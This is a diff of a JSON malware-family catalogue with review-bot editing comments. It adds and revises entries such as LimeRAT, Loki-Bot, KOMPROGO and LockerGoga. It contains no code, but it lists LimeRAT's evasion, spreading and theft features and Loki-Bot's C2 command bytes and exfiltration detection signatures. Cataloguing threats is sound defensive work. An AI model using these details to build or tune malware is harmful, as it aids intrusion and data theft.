 "synonyms": [],
 "type": []
@@ -8794,19 +10316,6 @@
 "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5",
 "value": "KEYMARBLE"
 },
- {
- "description": "",
- "meta": {
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.keypass",
- "https://securelist.com/keypass-ransomware/87412/"
- ],
- "synonyms": [],
- "type": []
- },
- "uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd",
- "value": "KeyPass"
- },
 {
 "description": "",
 "meta": {
@@ -8872,6 +10381,7 @@
 "description": "KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with a IP retriever module, a Outlook stealer (32bit/64bit) and a Chrome/Firefox stealer (32bit/64bit). Earlier versions come bundled (loader plus modules), newer versions come with a loader (167k) that grabs the modules.\r\n\r\nPDB-strings suggest a relationship to JogLog v6 and v7.",
 "meta": {
 "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer",
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer"
 ],
 "synonyms": [
@@ -8888,7 +10398,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd",
 "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://www.morphick.com/resources/news/klrd-keylogger"
+ "https://securitykitten.github.io/2016/11/28/the-klrd-keylogger.html"
 ],
 "synonyms": [],
 "type": []
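Review bot: The added line in hunk `@@ -8872,6 +10381,7 @@` duplicates the reference that already follows it, so the KleptoParasite `refs` array now lists `https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer` twice; the added line should be dropped, or the generator that emits this file should de-duplicate `refs` before writing. Duplicate strings in a galaxy array parse fine but surface twice in every consumer and hide real changes in later diffs. The enclosing object starts before this hunk.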
@@ -8923,6 +10433,22 @@
 "uuid": "f7674d06-450a-4150-9180-afef94cce53c",
 "value": "KokoKrypt"
 },
+ {
+ "description": "KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management, Creating a reverse shell, running WMI queries, retrieving information about the infected system.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo",
+ "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
+ "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf",
+ "https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99",
+ "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "116f4c5f-fd51-4e90-995b-f16c46523c06",
+ "value": "KOMPROGO"
+ },
 {
 "description": "",
 "meta": {
@@ -9019,10 +10545,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker",
+ "https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html",
 "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/",
 "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan",
- "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/",
- "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf"
+ "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf",
+ "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/"
 ],
 "synonyms": [
 "BlackMoon"
@@ -9050,13 +10577,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos",
- "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
+ "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack",
 "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn",
+ "https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/",
 "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/",
 "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en",
 "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/",
 "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en",
- "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack",
+ "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/",
 "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos",
 "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/",
 "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
@@ -9124,12 +10652,26 @@
 "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58",
 "value": "Kurton"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki",
+ "https://cofense.com/kutaki-malware-bypasses-gateways-steal-users-credentials/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ff40299b-dc45-4a1c-bfe2-3864682b8fea",
+ "value": "Kutaki"
+ },
 {
 "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs",
- "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
+ "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia",
+ "https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/"
 ],
 "synonyms": [],
 "type": []
@@ -9213,6 +10755,19 @@
 "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72",
 "value": "Laziok"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazycat",
+ "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "454db469-724a-4084-873c-906abf91d0d5",
+ "value": "LazyCat"
+ },
 {
 "description": "",
 "meta": {
@@ -9259,6 +10814,21 @@ "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", "value": "Lethic" }, + { + "description": " ## Description\r\n Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a general knowledge about dotNET malwares and how it behaves. \r\n \r\n ---\r\n\r\n## Main Features\r\n\r\n- **.NET**\r\n - Coded in Visual Basic .NET, Client required framework 2.0 or 4.0 dependency, And server is 4.0\r\n- **Connection**\r\n - Using pastebin.com as ip:port , Instead of noip.com DNS. And Also using multi-ports\r\n- **Plugin**\r\n - Using plugin system to decrease stub's size and lower the AV detection\r\n- **Encryption**\r\n - The communication between server & client is encrypted with AES\r\n- **Spreading**\r\n - Infecting all files and folders on USB drivers\r\n- **Bypass**\r\n - Low AV detection and undetected startup method\r\n- **Lightweight**\r\n - Payload size is about 25 KB\r\n- **Anti Virtual Machines**\r\n - Uninstall itself if the machine is virtual to avoid scanning or analyzing \r\n- **Ransomware**\r\n - Encrypting files on all HHD and USB with .Lime extension\r\n- **XMR Miner**\r\n - High performance Monero CPU miner with user idle\\active optimizations\r\n- **DDoS**\r\n - Creating a powerful DDOS attack to make an online service unavailable\r\n- **Crypto Stealer**\r\n - Stealing Cryptocurrency sensitive data\r\n- **Screen-Locker**\r\n - Prevents user from accessing their Windows GUI \r\n - **And more**\r\n - On Connect Auto Task\r\n\t- Force enable Windows RDP\r\n\t- Persistence\r\n - File manager\r\n - Passowrds stealer\r\n - Remote desktop\r\n - Bitcoin grabber\r\n - Downloader\r\n - Keylogger", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat", + "https://www.youtube.com/watch?v=x-g-ZLeX8GM", + "https://blog.yoroi.company/research/limerat-spreads-in-the-wild/", + "https://github.com/NYAN-x-CAT/Lime-RAT/" + ], + "synonyms": [], + "type": [] + }, + 
"uuid": "771dbe6a-3f01-4bd4-8edd-070b2eb9df66",
+ "value": "LimeRAT"
+ },
 {
 "description": "",
 "meta": {
@@ -9298,6 +10868,25 @@
 "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8",
 "value": "LiteHTTP"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga",
+ "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202",
+ "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
+ "https://www.abuse.io/lockergoga.txt",
+ "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880",
+ "https://www.youtube.com/watch?v=o6eEN0mUakM",
+ "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/",
+ "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a4a6469d-6753-4195-9635-f11d458525f9",
+ "value": "LockerGoga"
+ },
 {
 "description": "",
 "meta": {
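Review bot: The new LimeRAT `description` in hunk `@@ -9259,6 +10814,21 @@` (which starts on the previous line) is the project README pasted verbatim, with a leading space, Markdown headings, tab characters and the upstream typo `Passowrds`, whereas every other description in this file is a short plain-text summary. A one- or two-sentence summary of what the cluster is (a .NET RAT with plugin, ransomware, miner and USB-spreading modules) fits the field better and leaves the feature list to the linked references. The same leading-space problem appears in the LunchMoney description (`@@ -9458,6 +11075,20 @@`) and the MurkyTop description (`@@ -10300,7 +11963,7 @@`), which additionally starts lowercase (`" a command-line reconnaissance tool..."`).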
@@ -9358,7 +10947,7 @@
 "value": "LockPOS"
 },
 {
- "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.",
+ "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda",
@@ -9400,22 +10989,36 @@ "value": "LogPOS" }, { - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. 
If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. 
This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lojax", + "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "15228ae0-26f9-44d8-8d6e-87b0bd2d2aba", + "value": "LoJax" + }, + { + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. 
While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. 
By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. 
This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", + "https://isc.sans.edu/diary/24372", "https://github.com/R3MRUM/loki-parse", "http://www.malware-traffic-analysis.net/2017/06/12/index.html", "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", - "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", "http://blog.fernandodominguez.me/lokis-antis-analysis/", "https://phishme.com/loki-bot-malware/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", + 
"https://securelist.com/loki-bot-stealing-corporate-passwords/87595/", "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", - "https://securelist.com/loki-bot-stealing-corporate-passwords/87595/" + "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850" ], "synonyms": [ "Loki", 
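Review bot: The re-serialised Loki-Bot description in hunk `@@ -9400,22 +10989,36 @@` (starting several lines above) still carries the duplicated word in `This value value is typically \u201cckav.ru\u201d`; since the whole line is rewritten anyway, `This value is typically \u201cckav.ru\u201d` is the obvious fix. The rest of that line is an equivalent escaping of the curly quotes and needs no change.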
@@ -9440,17 +11043,31 @@
 "uuid": "fa61a690-fd9c-4036-97fb-bf3674aa60b2",
 "value": "Lordix"
 },
+ {
+ "description": "LOWBALL, uses the legitimate Dropbox cloud-storage\r\nservice to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball",
+ "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "484b9fd9-76c6-41af-a85b-189b0fc94909",
+ "value": "LOWBALL"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat",
- "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/",
+ "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html",
 "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/",
 "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/",
- "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html",
+ "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/",
 "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/",
- "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark"
+ "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf"
 ],
 "synonyms": [],
 "type": []
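Review bot: The new LOWBALL description carries a hard line break inside a sentence (`cloud-storage\r\nservice`) and a stray comma after the name (`LOWBALL, uses`), both of which look like artefacts of copying from the cited FireEye write-up; `LOWBALL uses the legitimate Dropbox cloud-storage service to act as the CnC server.` reads cleanly in the description field. The rest of the hunk only reorders and extends the Luminosity RAT references.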
@@ -9458,6 +11075,20 @@
 "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a",
 "value": "Luminosity RAT"
 },
+ {
+ "description": " An uploader that can exfiltrate files to Dropbox.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney",
+ "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html",
+ "https://twitter.com/MrDanPerez/status/1097881406661902337"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fb0167e5-3457-46ec-a6d1-b8e4ad9bc89b",
+ "value": "LunchMoney"
+ },
 {
 "description": "",
 "meta": {
@@ -9761,7 +11392,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat",
- "http://www.clearskysec.com/tulip/"
+ "http://www.clearskysec.com/tulip/",
+ "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -9818,6 +11450,19 @@
 "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6",
 "value": "Mebromi"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical",
+ "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cd055701-89ad-41be-b4d9-69460876fdee",
+ "value": "MECHANICAL"
+ },
 {
 "description": "",
 "meta": {
@@ -9847,6 +11492,21 @@
 "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06",
 "value": "Medusa"
 },
+ {
+ "description": "Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.merlin",
+ "http://lockboxx.blogspot.com/2018/02/intro-to-using-gscript-for-red-teams.html",
+ "http://lockboxx.blogspot.com/2018/02/merlin-for-red-teams.html",
+ "https://github.com/Ne0nd0g/merlin"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "427e4b41-adf6-4d4d-a83f-6d96b5ab4a3e",
+ "value": "Merlin"
+ },
 {
 "description": "",
 "meta": {
@@ -9963,6 +11623,7 @@
 "https://github.com/gentilkiwi/mimikatz",
 "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/",
 "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle",
+ "https://www.crowdstrike.com/blog/credential-theft-mimikatz-techniques/",
 " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"
 ],
 "synonyms": [],
@@ -10279,7 +11940,9 @@
 "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
 "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
 ],
- "synonyms": [],
+ "synonyms": [
+ "MPK"
+ ],
 "type": []
 },
 "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621",
@@ -10300,7 +11963,7 @@
 "value": "Multigrain POS"
 },
 {
- "description": "",
+ "description": " a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop",
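Review bot: The Mimikatz `refs` array edited in hunk `@@ -9963,6 +11623,7 @@` keeps the pre-existing entry with a leading space inside the string, `" https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks"`; consumers that match or de-duplicate on the exact string treat it as a URL distinct from the trimmed form, and since this commit already touches the array it is the natural place to strip the space. The enclosing `refs` array starts before the hunk.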
@@ -10365,11 +12028,14 @@
 "value": "MyloBot"
 },
 {
- "description": "",
+ "description": "Botnet with focus on banks in Latin America and South America.\r\nRelies on DLL Sideloading attacks to execute malicious DLL files.\r\nUses legitimate VMWare executable in attacks. \r\nAs of March 2019, the malware is under active development with updated versions coming out on persistent basis.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40",
- "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector"
+ "http://reversingminds-blog.logdown.com/posts/7807545-analysis-of-advanced-brazilian-banker-malware",
+ "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector",
+ "http://blog.en.elevenpaths.com/2018/05/new-report-malware-attacks-chilean.html",
+ "https://socprime.com/en/news/attackers-exploit-dll-hijacking-to-bypass-smartscreen/"
 ],
 "synonyms": [],
 "type": []
@@ -10422,6 +12088,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore",
 "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
 "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
 "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/"
 ],
@@ -10598,11 +12265,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire",
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
 "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/",
- "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data",
+ "https://www.circl.lu/pub/tr-23/",
+ "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
 "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html",
- "https://www.circl.lu/pub/tr-23/"
+ "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data",
+ "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/"
 ],
 "synonyms": [
 "Recam"
@@ -10631,6 +12299,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino",
 "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/",
+ "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html",
